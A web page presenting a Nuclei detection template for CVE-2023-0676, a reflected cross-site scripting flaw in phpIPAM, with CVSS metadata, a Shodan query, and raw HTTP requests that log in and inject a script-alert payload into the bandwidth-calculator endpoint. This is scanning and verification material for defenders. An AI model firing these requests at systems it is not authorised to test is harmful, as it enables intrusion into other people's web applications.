phpIPAM 1.5.1 - Cross-site Scripting

ID: CVE-2023-0676

Severity: medium

Author: ritikchaddha

Tags: cve,cve2023,phpipam,xss,authenticated

Description

Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.

YAML Source

id: CVE-2023-0676

info:
  name: phpIPAM 1.5.1 - Cross-site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.
  impact: |
    Allows attackers to execute malicious scripts in the context of a user's browser session.
  remediation: |
    Update phpipam/phpipam to the latest version to patch the vulnerability.
  reference:
    - https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0676
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0676
    cwe-id: CWE-79
    epss-score: 0.00059
    epss-percentile: 0.24112
    cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*
  metadata:
    vendor: phpipam
    product: phpipam
    shodan-query: html:"phpIPAM IP address management"
  tags: cve,cve2023,phpipam,xss,authenticated

http:
  - raw:
      - |
        POST /app/login/login_check.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ipamusername={{username}}&ipampassword={{password}}

      - |
        POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: {{BaseURL}}/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator

        wsize=50000&delay=<script>alert(document.domain)</script>&fsize=1024

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "Login successful")
          - contains(body_2, "<script>alert(document.domain)</script>")
          - contains(content_type_2, "text/html")
          - status_code_2 == 200
        condition: and
# digest: 490a0046304402202e7cbe2e8c82689ec34acc0be8577ec765aaa10990d9ec3fef283492a6842e01022050eb4325135554fb306a9d27835c7c5486da9e6e5a0e90fdda842bd385c6643d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0676.yaml"

View on Github